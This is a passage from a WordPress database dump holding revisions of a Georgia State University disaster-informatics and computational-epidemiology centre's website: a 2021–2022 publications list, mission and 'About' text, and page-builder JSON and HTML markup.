K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','inherit','closed','closed','','612-revision-v1','','','2022-03-29 22:26:08','2022-03-30 02:26:08','',612,'https://gsudice.dataconn.net/?p=920',0,'revision','',0),(921,1,'2022-03-29 22:26:08','2022-03-30 02:26:08','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n            <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n                    <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and\n                      Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\n                    <p><strong>2021</strong></p>\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n                      (pp. 1-6). IEEE.</p>\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n                      (pp. 631-640). IEEE.</p>\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n                      (pp. 505-506).</p>\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n                      (S3) Workshop (pp. 1-2).</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-29 22:26:08','2022-03-30 02:26:08','',608,'https://gsudice.dataconn.net/?p=921',0,'revision','',0),(927,1,'2022-03-31 23:37:54','2022-04-01 03:37:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c17\",\"index\":0,\"id\":\"122-c18\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c15\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c21\",\"parentId\":\"122-c20\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c20\",\"parentId\":\"122-c19\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c15\",\"index\":0,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c15\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-03-31 23:37:54','2022-04-01 03:37:54','',353,'https://gsudice.dataconn.net/?p=927',0,'revision','',0),(928,1,'2022-03-31 23:37:54','2022-04-01 03:37:54','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c15\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c15 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c16\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c16 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c17-outer\">\n            <div data-colibri-id=\"122-c17\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c17 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c18\" class=\"h-global-transition-all h-heading style-324 style-local-122-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c18\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Our Mission</h3>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c19\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c19 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c20-outer\">\n            <div data-colibri-id=\"122-c20\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c20 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-319 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-03-31 23:37:54','2022-04-01 03:37:54','',122,'https://gsudice.dataconn.net/?p=928',0,'revision','',0),(935,1,'2022-03-31 23:40:07','2022-04-01 03:40:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response 